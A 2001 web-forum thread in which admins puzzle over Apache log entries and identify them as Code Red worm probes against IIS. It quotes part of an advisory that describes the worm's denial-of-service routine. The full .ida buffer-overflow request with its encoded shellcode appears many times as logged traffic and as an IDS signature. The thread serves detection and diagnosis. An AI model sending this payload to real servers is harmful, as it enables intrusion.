verrry interesting Apache logsnip


Page 1 of 2 12 LastLast
Results 1 to 15 of 18

Thread: verrry interesting Apache logsnip

  1. #1
    Join Date
    Oct 2000
    Location
    Lilburn, Ga. USA
    Posts
    920

    verrry interesting Apache logsnip

    Look at this:

    szptt170.szptt.net.cn - - [19/Jul/2001:10:45:59 -0400] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNN
    NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
    NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
    NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
    NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
    NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
    NNNNNNNNN%u9090%u6858%ucbd3%u7801%u9
    090%u6858%ucbd3%u7801%u9090%u6858%ucbd3
    %u7801%u9090%u9090%u8190%u00c3%u0003
    %u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 205

    Hmmm. I might guess that this is a buffer overrun attempt, I cannot read raw machine code, (except for the no-ops and the one unconditional jump i see there) . What IS this guy doing, do you suppose? Is that an Apache attack or intended for IIS, or what? Anybody seen it before?
    Thanks, Ray

    [ 19 July 2001: Message edited by: posterboy ]
    ray@raymondjones.net
    HTTP://www.raymondjones.net

  2. #2
    Join Date
    Nov 2000
    Location
    Burlington, Ontario, Canada
    Posts
    364
    you could be right about the buffer overflow...

    however, i'm not sure.
    generally, if you try to overflow a buffer, you put garbage text, and then you put your commands...
    that looks like garbage, and then machine code...

    does %u perhaps indicate machine code?
    if so, then see if you can decode it
    Be what you would seem to be - or, if you'd like it put more simply - never imagine yourself not to be otherwise than what it might appear to others that what you were or might have been was not otherwise than what you had been would have appeared to them to be otherwise. --Lewis Carrol

  3. #3
    Join Date
    Feb 2000
    Location
    Southern Maryland
    Posts
    1,195
    61.135.53.8 - - [19/Jul/2001:11:55:16 -0500] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u0 0c3%u0003%u8b00%u531b%u53ff%u0 078%u0000%u00=a HTTP/1.0" 404 205
    206.65.190.134 - - [19/Jul/2001:11:58:46 -0500] "GET /themes/Green/logo.gif HTTP/1.1" 304 -
    206.65.190.134 - - [19/Jul/2001:11:58:47 -0500] "GET /index.php HTTP/1.1" 200 15595
    209.116.117.194 - - [19/Jul/2001:12:16:47 -0500] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u0 0c3%u0003%u8b00%u531b%u53ff%u0 078%u0000%u00=a HTTP/1.0" 404 205
    195.184.235.226 - - [19/Jul/2001:12:18:58 -0500] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u0 0c3%u0003%u8b00%u531b%u53ff%u0 078%u0000%u00=a HTTP/1.0" 404 205
    212.19.62.202 - - [19/Jul/2001:12:48:00 -0500] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u0 0c3%u0003%u8b00%u531b%u53ff%u0 078%u0000%u00=a HTTP/1.0" 404 205
    I don't know what the he!! this is supposed to do. I tried it on my own server but just got a 404 error.

    [ 19 July 2001: Message edited by: The Whizzard ]

  4. #4
    Join Date
    Oct 2000
    Location
    Lilburn, Ga. USA
    Posts
    920
    OK, this is getting werser and werser. I now have had this same NNNNNNNN (machine code) come from all the below addresses, and more. Is this something going wrong here locally, or are these spoofed addies, or what do you think?

    n481p012.adsl.highway.telekom.at
    62.254.162.177
    203.145.135.11
    1cust242.tnt3.erie.pa.da.uu.net
    vector.fnal.gov
    josheph.excite.com
    24-29-154-30.nyc.rr.com
    skinfillill.byu.edu
    ajh444yqy12e.bc.hsia.telus.net
    dinodung.kennesaw.edu
    e3.wdata.com

    There are maybe 15 more I didn't bother to C&P, but they all are identical. Apache is sending them all a 404 as I certainly don't have anything named default.ida, nor is the request properly formed, it ought to be something like GET / HTTP/1.0, and then the page, right?
    I tried a few of these addresses
    dinodung.kennesaaw.edu certainly does ping, as does e3.wdata.com, and some others. They are live machines, currently active on the internet. HEEEELLLLLPPPPPPP!!!!!!!! I don't understand this at all. Thanks, Ray

    null
    ray@raymondjones.net
    HTTP://www.raymondjones.net

  5. #5
    Join Date
    Jan 2000
    Posts
    110
    me too:

    209.147.47.82 - - [19/Jul/2001:11:56:29 -0500] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNN
    NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNN
    NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858% ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc bd3%u7801%u9090%u9090%u819
    0%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 329
    217.0.129.223 - - [19/Jul/2001:14:52:41 -0500] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNN
    NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNN
    NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858% ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc bd3%u7801%u9090%u9090%u819
    0%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 329
    202.127.12.38 - - [19/Jul/2001:15:02:39 -0500] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNN
    NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNN
    NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858% ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc bd3%u7801%u9090%u9090%u819
    0%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 329
    63.251.93.43 - - [19/Jul/2001:15:28:37 -0500] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNN
    NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNN
    NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%u cbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucb d3%u7801%u9090%u9090%u8190
    %u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 329
    64.219.102.105 - - [19/Jul/2001:15:51:37 -0500] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNN
    NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNN
    NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858 %ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%u cbd3%u7801%u9090%u9090%u81
    90%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 329
    168.8.80.8 - - [19/Jul/2001:16:05:41 -0500] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNN
    NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNN
    NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucb d3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3 %u7801%u9090%u9090%u8190%u
    00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 329
    66.26.212.131 - - [19/Jul/2001:16:32:02 -0500] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNN
    NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNN
    NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858% ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc bd3%u7801%u9090%u9090%u819
    0%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 329
    168.169.162.33 - - [19/Jul/2001:16:44:51 -0500] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNN
    NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNN
    NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858 %ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%u cbd3%u7801%u9090%u9090%u81
    90%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 329
    211.50.29.89 - - [19/Jul/2001:17:05:34 -0500] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNN
    NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNN
    NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%u cbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucb d3%u7801%u9090%u9090%u8190
    %u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 329
    211.39.34.211 - - [19/Jul/2001:17:06:24 -0500] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNN
    NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNN
    NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858% ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc bd3%u7801%u9090%u9090%u819
    0%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 329
    203.235.44.30 - - [19/Jul/2001:17:11:28 -0500] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNN
    NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNN
    NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858% ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc bd3%u7801%u9090%u9090%u819
    0%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 329

    I've got similar logs on two machines.

    [ 19 July 2001: Message edited by: spickus ]
    The UNIX philosophy basically involves giving you enough rope to
    hang yourself. And then a couple of feet more, just to be sure.

  6. #6
    Join Date
    Jan 2000
    Posts
    110
    I looked up apache error 400 - bad request.
    http://www.bignosebird.com/apache/a5.shtml
    The UNIX philosophy basically involves giving you enough rope to
    hang yourself. And then a couple of feet more, just to be sure.

  7. #7
    Join Date
    Oct 2000
    Location
    Lilburn, Ga. USA
    Posts
    920
    Yes, it is a mal-formed request. It can't answer GET /default.ida, it needs to look like GET / HTTP/1.0, however, in my initial post, note that I am sending them a 404, page not found error. I don't have a grip on that, either.
    Ray
    ray@raymondjones.net
    HTTP://www.raymondjones.net

  8. #8
    Join Date
    Oct 2000
    Location
    Lilburn, Ga. USA
    Posts
    920
    OK, here's something I found on the net, about the "Code-Red" worm. I have no idea that this is related, but, it's worth reading. http://news.cnet.com/news/0-1003-200...92.html?tag=lh
    ray@raymondjones.net
    HTTP://www.raymondjones.net

  9. #9
    Join Date
    Jan 2000
    Posts
    110
    I think that's a different exploit. Man, I'm getting hammered with these.

    [ 19 July 2001: Message edited by: spickus ]
    The UNIX philosophy basically involves giving you enough rope to
    hang yourself. And then a couple of feet more, just to be sure.

  10. #10
    Join Date
    Oct 2000
    Location
    Lilburn, Ga. USA
    Posts
    920
    I just counted, I have 60 since this morning at 10:30 AM East Coast. Sheesh!!!!
    Can anybody help us with what's going on, please?
    ray@raymondjones.net
    HTTP://www.raymondjones.net

  11. #11
    Join Date
    Sep 1999
    Location
    Gainesville, FL
    Posts
    44
    I am pretty sure that that is looking for an IIS exploit. When I get off of work I will see if I still have the email I got about this. I think that what posterboy posted was right and it is the Code-Red worm

  12. #12
    Join Date
    Jan 2000
    Posts
    110
    The UNIX philosophy basically involves giving you enough rope to
    hang yourself. And then a couple of feet more, just to be sure.

  13. #13
    Join Date
    Oct 2000
    Location
    Lilburn, Ga. USA
    Posts
    920
    I am now satisfied that this is indeed the "Code Red" thingy. This reference to the .ida stuff pulled me into that notion, as pointed to by spickus. Thank you for that, and I will relax a bit, as this doesn't target Apache at all. This thing is a bandwidth eater, but I can survive a few hits to the page, this is a hobby for me, and nothing more. I do feel for the admins running stuff commercially, this will surely have an impact. Why do companies run that buggy IIS thing, anyway? There's a new exploit every few weeks, it seems. Thanks to all you guys for helping us with this, this is one of the best possible uses for this board. In a couple of hours, the issue has been laid to rest. Good on you.
    ray@raymondjones.net
    HTTP://www.raymondjones.net

  14. #14
    Join Date
    Mar 2000
    Posts
    71
    It is the code red worm ---

    How many hits do you have so far?? I have 15 in my logs from today alone.

    Apparently, they used a static random seed, so the random ip addresses genereated by each machine have been the same --

    I've been hit 16 different times today, by different IP addresses

    How many time you been hit?!

  15. #15
    Join Date
    Nov 2000
    Location
    Burlington, Ontario, Canada
    Posts
    364
    From the Code Red text file:

    Introduction
    ============
    On Friday July 13th we received packet logs and information from 2 network administrators that were experiencing large amounts of attacks targeting the recent .ida vulnerability that eEye Digital Security discovered (http://www.eeye.com/html/Research/Advisories/AD20010618.html) on June 18, 2001. After reviewing the logs sent to us we determined that in fact someone had released a worm into the Internet that was spreading rapidly through IIS web servers.

    The full analysis of the .ida "Code Red" worm has provided numerous new details as to the functionality and method of propagation of this worm. For instance this worms purpose ultimately seems to be to perform a denial of service attack against www.whitehouse.gov. Also it has been found that only US English Windows NT/2000 systems will show the defaced ("Hacked by Chinese !") web page.

    We've designated this the .ida "Code Red" worm, because part of the worm is designed to deface web pages with the text "Hacked by Chinese" and also because code red mountain dew was the only thing that kept us awake all last night to be able to disassemble this exploit even further.


    How to setup your IDS to detect this specific worm?
    ---------------------------------------------------
    The following is part of the packet data that is sent for this .ida "Code Red" worm attack:
    GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u0 0c3%u0003%u8b00%u531b%u53ff%u0 078%u0000%u00=a HTTP/1.0

    Attack www.whitehouse.gov functionality
    ---------------------------------------
    Sooner or later every thread within the worm seems to shift its attacking focus to www.whitehouse.gov.

    1. create socket and connect to www.whitehouse.gov on port 80 and send 100k byes of data
    CODEREF: seg000:000008AD WHITEHOUSE_SOCKET_SETUP

    Initially the worm will create a socket and connect to 198.137.240.91 (www.whitehouse.gov/www1.whitehouse.gov) on port 80.

    CODEREF: seg000:0000092F WHITEHOUSE_SOCKET_SEND
    If this connection is made then the worm will create a loop that performs 18000h single byte send()'s to www.whitehouse.gov.

    CODEREF: seg000:00000972 WHITEHOUSE_SLEEP_LOOP
    After 18000h send()'s the worm will sleep for about 4 and a half hours. It will then repeat the attack against www.whitehouse.gov (goto step one of Attack www.whitehouse.gov functionality).

    read up on the advisory...
    what web server are you running? iis?
    i hope you're not running apache, because that might mean that it infects apache as well...

    that would suck ***...
    but the file didn't say anything about it infecting apache, although that could just mean that they haven't found any code that relates to apache..
    Be what you would seem to be - or, if you'd like it put more simply - never imagine yourself not to be otherwise than what it might appear to others that what you were or might have been was not otherwise than what you had been would have appeared to them to be otherwise. --Lewis Carrol

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •